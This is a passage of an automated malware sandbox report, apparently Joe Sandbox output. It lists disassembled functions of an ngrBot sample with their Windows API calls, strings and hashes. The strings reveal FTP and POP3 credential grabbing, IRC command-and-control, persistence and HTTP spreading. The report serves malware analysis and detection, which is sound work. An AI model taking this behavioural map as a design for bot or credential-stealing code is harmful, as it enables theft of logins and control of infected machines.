                                                                  • _stricmp.MSVCRT(0041A2B0,anonymous,00000000,000001FF,ftp://%s:%s@%s:%d,0041A2B0,0041A4B0,00000000,00000000), ref: 003D7AE8
                                                                  • _snprintf.MSVCRT(00000000,000001FF,pop3://%s:%s@%s:%d,0041A2B0,0041A4B0,00000000,00000000), ref: 003D7B66
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                  • lstrcpyA.KERNEL32(0041A2B0,003E1335,?,00000000,?), ref: 003D7BBC
                                                                  • lstrcpyA.KERNEL32(0041A4B0,003E1335), ref: 003D7BC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$lstrlen$Heaplstrcpy$AllocProcess_stricmpmemset
                                                                  • String ID: %s.%s (p='%S')$%s:%s@%s:%d$FEAT$LIST$PASS$PASV$STAT$TYPE$USER$anonymous$block$ftp://%s:%s@%s:%d$ftpgrab$ftplog$pop3://%s:%s@%s:%d$popgrab$poplog
                                                                  • API String ID: 389836911-2374598668
                                                                  • Opcode ID: 5e319ed7389ad80f4f248e69f141d307bf98331ca9d6ea2016708d24fe3428c1
                                                                  • Instruction ID: 93c4c2392e0f9db7cb17e8dfa444fb22cb4903c3c021d77488de138a61585c07
                                                                  • Opcode Fuzzy Hash: 5e319ed7389ad80f4f248e69f141d307bf98331ca9d6ea2016708d24fe3428c1
                                                                  • Instruction Fuzzy Hash: 5A818C33E093916ADB33AF64AC46FEE3A649B01710F194567F804A73C2F7B49994824B
                                                                  Function 003E0910 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 172sleepstringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003E0930
                                                                  • GetProcessHeap.KERNEL32 ref: 003E093D
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003E095D
                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 003E0982
                                                                  • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000,00000005,00000003), ref: 003E09BF
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
                                                                    • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                    • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
                                                                  • GetTickCount.KERNEL32 ref: 003E09CF
                                                                  • Sleep.KERNEL32 ref: 003E0A05
                                                                  • OpenMutexA.KERNEL32(001F0001,00000000,003E57AC), ref: 003E0A17
                                                                  • GetLastError.KERNEL32 ref: 003E0A27
                                                                  • GetLastError.KERNEL32 ref: 003E0A2E
                                                                  • ExitProcess.KERNEL32 ref: 003E0A32
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003E0A3D
                                                                  • _snprintf.MSVCRT(00000000,00000103,%08x,00000000,30e44aa1,00000000), ref: 003E0A60
                                                                  • ExitProcess.KERNEL32 ref: 003E0A79
                                                                  • ExitProcess.KERNEL32 ref: 003E0A98
                                                                  • GetModuleFileNameW.KERNEL32(00000000,0041AFB0,00000208), ref: 003E0ACC
                                                                  • wsprintfW.USER32(0041ADA0,%s\Microsoft\%s.exe,00000000,00000000), ref: 003E0ADE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0041ADA0,000000FF,0041AC50,00000104,00000000,00000000), ref: 003E0B06
                                                                  • lstrcpynW.KERNEL32(0041B1B8,00000000,00000208), ref: 003E0B13
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,0041B3E0,00000104,00000000,00000000), ref: 003E0B2E
                                                                  • Sleep.KERNEL32(000009C4), ref: 003E0B59
                                                                  • ExitProcess.KERNEL32 ref: 003E0B70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exitmemset$lstrlen$ByteCharErrorFileLastModuleMultiNameSleepWide_snprintf$CountExecuteHeapMutexOpenShellTick_vsnprintflstrcpynwsprintf
                                                                  • String ID: %08x$%s\Microsoft\%s.exe$30e44aa1$OPEN$ngrBot$running
                                                                  • API String ID: 2173303953-2917108782
                                                                  • Opcode ID: 6538089ac75dc441dbcc5e2ff1353eeb15020a9a869a10768152ffef778faaef
                                                                  • Instruction ID: 80fd95e48333533808185c41294b832c70153fe58fdf41648afe98b350f862a0
                                                                  • Opcode Fuzzy Hash: 6538089ac75dc441dbcc5e2ff1353eeb15020a9a869a10768152ffef778faaef
                                                                  • Instruction Fuzzy Hash: 3E51F976A803947BE722A7B1AC4BFDE3A2C9B44B11F404611F709FE2D2DAF455808766
                                                                  Function 003DFE00 Relevance: 48.2, APIs: 32, Instructions: 223stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,003E037C,?,003E32E4,00000000,00000000,httpi), ref: 003DFE11
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE40
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003DFE47
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE5E
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE72
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE7C
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000002), ref: 003DFE89
                                                                  • strtok.MSVCRT(?,003E19DC), ref: 003DFEA2
                                                                  • lstrcpyA.KERNEL32(00000000,003E1335), ref: 003DFEBB
                                                                  • lstrcatA.KERNEL32(00000000,003E19DC), ref: 003DFECD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DFEE4
                                                                  • _memicmp.MSVCRT(?,00000000,00000000), ref: 003DFEEF
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 003DFF0A
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF14
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 003DFF1F
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF33
                                                                  • lstrcatA.KERNEL32(00000000,003E3328), ref: 003DFF4B
                                                                  • strstr.MSVCRT(?,003E2B54), ref: 003DFF5C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DFF65
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF6B
                                                                  • strncat.MSVCRT(00000000,?,00000000), ref: 003DFF77
                                                                  • lstrcatA.KERNEL32(00000000,003E2B54), ref: 003DFF85
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF8F
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 003DFF9A
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFFAA
                                                                    • Part of subcall function 003DFD80: isalnum.MSVCRT(00000000,00000000,756F59EB,00000000,?,003DFFB9,00000000,00000000,00000000), ref: 003DFDAC
                                                                    • Part of subcall function 003DFD80: strchr.MSVCRT(-_.!~*'(),00000000,00000000), ref: 003DFDBE
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003DFFBE
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DFFCB
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 003DFFDF
                                                                  • strtok.MSVCRT(00000000,003E19DC), ref: 003DFFEC
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003E000F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E001C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E003C
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$AllocFree$strtok$Process_memicmpisalnumlstrcpystrchrstrncatstrstr
                                                                  • String ID:
                                                                  • API String ID: 423345748-0
                                                                  • Opcode ID: 7776314030eb92e533982b535381ed099873fbabf7ad05a1bff8aac9c5604b9c
                                                                  • Instruction ID: 1db263427b842fcc81f9757d02c1169591aca64c42ffe8026e0576619e646586
                                                                  • Opcode Fuzzy Hash: 7776314030eb92e533982b535381ed099873fbabf7ad05a1bff8aac9c5604b9c
                                                                  • Instruction Fuzzy Hash: 5E617E76A00295BFDB229BA5DC85EBF777CAF84700F104219F909DB380DAB4DD8187A0
                                                                  Function 003D99B0 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 205networkstringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D99D5
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 003D99EF
                                                                  • WSAStartup.WS2_32(00000002,?), ref: 003D9A00
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • htons.WS2_32(00000050), ref: 003D9A28
                                                                  • GetTickCount.KERNEL32(00000050,?), ref: 003D9A3A
                                                                  • GetTickCount.KERNEL32 ref: 003D9A4D
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 003D9A7B
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D9A96
                                                                  • connect.WS2_32(?,?,00000010), ref: 003D9AB1
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 003D9ABE
                                                                  • GetTickCount.KERNEL32 ref: 003D9AC4
                                                                  • lstrcpyA.KERNEL32(00000000,X-a: b), ref: 003D9AFE
                                                                  • lstrcpyA.KERNEL32(00000000,Connection: Close), ref: 003D9B0C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D9B0F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 003D9B41
                                                                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000), ref: 003D9B51
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D9B5E
                                                                  • GetTickCount.KERNEL32 ref: 003D9B66
                                                                  • Sleep.KERNEL32(000009C4), ref: 003D9B7F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 003D9BBE
                                                                  • GetTickCount.KERNEL32(?,00000000,00000000,00000000), ref: 003D9BD2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D9BE4
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 003D9C1E
                                                                  • closesocket.WS2_32(?), ref: 003D9C38
                                                                  • GetTickCount.KERNEL32(?,?,00000000,00000000,00000000), ref: 003D9C43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleeplstrlensend$lstrcpymemset$Startupclosesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID: Connection: Close$X-a: b
                                                                  • API String ID: 1989272289-3524857483
                                                                  • Opcode ID: 341925862333dea0a401c31742a6b05a5b37fd9063005b15a84647de86a6087b
                                                                  • Instruction ID: c319e2e602829af6ecc6e99fdf333643b618fd15312b8b088e21d8ab1f7a8d99
                                                                  • Opcode Fuzzy Hash: 341925862333dea0a401c31742a6b05a5b37fd9063005b15a84647de86a6087b
                                                                  • Instruction Fuzzy Hash: AE71AE73900268ABD722DBB0EC85FDE776D9B88700F114A57EA09EB2C0D6709E41CB91
                                                                  Function 003DAFA0 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 149stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 003DAFBD
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 003DAFCB
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DAFE8
                                                                  • memset.MSVCRT(?,00000000,000003FF,?,00000000,000003FF), ref: 003DB002
                                                                  • lstrlenA.KERNEL32(?), ref: 003DB013
                                                                  • sscanf.MSVCRT(00000000,POST /%1023s,00000000,00000000,?,00000000), ref: 003DB02A
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003DB041
                                                                  • _memicmp.MSVCRT(00000000,Host: ,00000006), ref: 003DB05B
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003DB06E
                                                                  • lstrlenA.KERNEL32(-00000006), ref: 003DB082
                                                                  • lstrcpynA.KERNEL32(00000000,-00000006,00000001), ref: 003DB08E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB09B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB0AD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB0BB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB0C6
                                                                  • HeapAlloc.KERNEL32(?,00000000,?), ref: 003DB0D5
                                                                  • _memicmp.MSVCRT(00000000,HTTP,00000004), ref: 003DB0EB
                                                                  • _snprintf.MSVCRT(00000000,?,http://%s/,00000000), ref: 003DB106
                                                                  • _snprintf.MSVCRT(00000000,?,http://%s/%s,00000000,00000000), ref: 003DB125
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DB13C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Alloc_memicmp_snprintfmemsetstrtok$Freelstrcpynsscanf
                                                                  • String ID: HTTP$Host: $POST /%1023s$http://%s/$http://%s/%s
                                                                  • API String ID: 3179755921-1264106924
                                                                  • Opcode ID: e4060a9ab81de6a378e2218679331c00fb608ed9bd7fb405b652eb89cb595b98
                                                                  • Instruction ID: 0c19122b79039c13f67a8b5ca9807d4892702dc055ad58ffc406c7087314fcd4
                                                                  • Opcode Fuzzy Hash: e4060a9ab81de6a378e2218679331c00fb608ed9bd7fb405b652eb89cb595b98
                                                                  • Instruction Fuzzy Hash: 144119B3D40268A7D726A7A19C42FEB736CDF84710F054690FB08A6281E7B09E458BE1
                                                                  Function 003D6A40 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 166stringthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D6A68
                                                                  • lstrlenA.KERNEL32 ref: 003D6B03
                                                                  • _memicmp.MSVCRT(?,00000000,00000000), ref: 003D6B0E
                                                                  • _memicmp.MSVCRT(?,JOIN,00000004), ref: 003D6B22
                                                                  • _memicmp.MSVCRT(?,PRIVMSG,00000007), ref: 003D6B36
                                                                  • sscanf.MSVCRT(?,JOIN %255s,?), ref: 003D6B4F
                                                                  • sscanf.MSVCRT(?,PRIVMSG %255s,?), ref: 003D6B69
                                                                  • lstrlenA.KERNEL32(?), ref: 003D6BD5
                                                                  • SetFileAttributesW.KERNEL32(0041A710,00000080), ref: 003D6C31
                                                                  • MoveFileExW.KERNEL32(0041A710,00000000,00000004), ref: 003D6C40
                                                                  • closesocket.WS2_32(?), ref: 003D6C60
                                                                  • ExitThread.KERNEL32 ref: 003D6C67
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA335
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA34F
                                                                    • Part of subcall function 003DA310: memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
                                                                    • Part of subcall function 003DA310: _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
                                                                    • Part of subcall function 003DA310: _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
                                                                    • Part of subcall function 003DA310: EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
                                                                    • Part of subcall function 003DA310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
                                                                    • Part of subcall function 003DA310: LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$File_memicmp$CriticalSectionsprintfsscanf$AttributesCreateEnterExitLeaveMoveThread_snprintf_vsnprintfclosesocket
                                                                  • String ID: %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).$%s.Detected process "%S" sending an IRC packet to server %s:%d.$%s:%d$JOIN$JOIN %255s$PRIVMSG$PRIVMSG %255s$block$cnc$pdef
                                                                  • API String ID: 1085873876-1467418891
                                                                  • Opcode ID: ad57af4fdd33459d1978493fbe514d14aff80ee509c775353f3178ecef303953
                                                                  • Instruction ID: 40268564898c2e59eab56419d9c26dc3686e5ead2f1c06034370adff3a56dd08
                                                                  • Opcode Fuzzy Hash: ad57af4fdd33459d1978493fbe514d14aff80ee509c775353f3178ecef303953
                                                                  • Instruction Fuzzy Hash: 4F510872A002547BDF239F56AC87FEE376CAB40704F050527F924A73C1E6B0A99486A2
                                                                  Function 003E0050 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 135stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103,00000000,00000000,00000000), ref: 003E0071
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 003E0080
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E00AB
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E00B6
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 003E00CB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E00D2
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E00E3
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003E00F9
                                                                  • strstr.MSVCRT(00000000,003E19DC), ref: 003E0117
                                                                  • strstr.MSVCRT(00000000,003E2B54), ref: 003E0129
                                                                  • lstrcatA.KERNEL32(00000000,003E2B84), ref: 003E0141
                                                                  • _memicmp.MSVCRT(00000000,Content-Length: ,00000010), ref: 003E014E
                                                                  • lstrcatA.KERNEL32(00000000,Content-Length: ), ref: 003E0160
                                                                  • _snprintf.MSVCRT(00000000,00000103,003E2B10,00000000), ref: 003E0177
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003E018A
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003E0193
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 003E01AB
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003E01B2
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E01BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$Heap$Alloclstrlenstrstrstrtok$FreeProcess_memicmp_snprintflstrcpymemset
                                                                  • String ID: $Content-Length:
                                                                  • API String ID: 4006885983-3599722475
                                                                  • Opcode ID: 593dd18d424cbe01fd3e5286a7b0b05e3272a382d0440340a6ab01e9ab38379f
                                                                  • Instruction ID: df23ddb5b6cd69d3f02c2411ef8cb9ff2a1932305224657d326be39e35379039
                                                                  • Opcode Fuzzy Hash: 593dd18d424cbe01fd3e5286a7b0b05e3272a382d0440340a6ab01e9ab38379f
                                                                  • Instruction Fuzzy Hash: 9E4109356003A5BBD726AB629C85FEF776C9F54711F014314FD08AE2C1EBF49A818AA0
                                                                  Function 003DA310 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 127stringfilesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003DA335
                                                                  • memset.MSVCRT ref: 003DA34F
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
                                                                  • _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
                                                                  • sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
                                                                  • _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
                                                                  • sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
                                                                  • EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
                                                                  • LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003DA484
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA48B
                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA496
                                                                  • LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA4A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CriticalSectionmemset$FileLeavesprintf$CloseCreateEnterHandleSleepWrite_snprintf_vsnprintf
                                                                  • String ID: %d.$30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4010528547-3602371622
                                                                  • Opcode ID: 700bcdec2084028057f61898a211a257a2cf50654c2bfedee42fccbf0c1ee404
                                                                  • Instruction ID: 7cf458987ab8181f45a436a59c6b0c6edc55f16d59d0a4aa0de4ee774582ea50
                                                                  • Opcode Fuzzy Hash: 700bcdec2084028057f61898a211a257a2cf50654c2bfedee42fccbf0c1ee404
                                                                  • Instruction Fuzzy Hash: B14120B65403587BD722E7A1DC86FEE733CDF88701F004694F708AA1C1D6F41A848B65
                                                                  Function 003E01E0 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 189memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF,00000000,00000000,00000000), ref: 003E0202
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 003E0213
                                                                  • EnterCriticalSection.KERNEL32(0041B4E4), ref: 003E0223
                                                                  • strstr.MSVCRT(00000000,003E19DC), ref: 003E0243
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E0254
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E025F
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 003E0272
                                                                  • strstr.MSVCRT(00000000,), ref: 003E0281
                                                                  • _snprintf.MSVCRT(00000000,000001FF,%s=,003E32E4), ref: 003E02C8
                                                                  • strstr.MSVCRT(?,00000000), ref: 003E02EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 003E0322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E0386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03EE
                                                                  • LeaveCriticalSection.KERNEL32(0041B4E4), ref: 003E03FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Freestrstr$CriticalSectionlstrlen$AllocEnterLeaveProcess_snprintfatoilstrcpymemset
                                                                  • String ID: $%s.%s hijacked!$%s=$http$httpi$httpspread$int$msg
                                                                  • API String ID: 2097228407-1593535274
                                                                  • Opcode ID: 739d7b980c4c499480a26c14b78cbaefd4341615155723ce6308a73f184373ee
                                                                  • Instruction ID: f593838dcd3a470ad92d18fe610b6d1648fbc3cb4c8f2e724a07f085708a9900
                                                                  • Opcode Fuzzy Hash: 739d7b980c4c499480a26c14b78cbaefd4341615155723ce6308a73f184373ee
                                                                  • Instruction Fuzzy Hash: 29510A75A402A5ABDB279BA29C85BFF737CEB50700F004729F914A62C1DBF49D408BA1
                                                                  Function 003DD220 Relevance: 34.7, APIs: 11, Strings: 12, Instructions: 209stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strstrstrtok$lstrcmplstrlen
                                                                  • String ID: W>$001$332$376$433$JOIN$KCIK %s$MOTD$PING$PPNG %s$PPPPMSG$SEND %s %s
                                                                  • API String ID: 4048585210-2775256916
                                                                  • Opcode ID: 6427e7d67f319657f38059b421aa9dd221d444ed5d73697d74d9a421a8465af4
                                                                  • Instruction ID: ab876750450a303c1cc23014a502dfa77a66396e53c42288306e46d32b72b813
                                                                  • Opcode Fuzzy Hash: 6427e7d67f319657f38059b421aa9dd221d444ed5d73697d74d9a421a8465af4
                                                                  • Instruction Fuzzy Hash: EE5139B7F4021967DB12B669BC82EAB736CDB80319F014667FC08DA381FA71ED5146E1
                                                                  Function 003DAE00 Relevance: 34.7, APIs: 23, Instructions: 165stringmemoryCOMMON
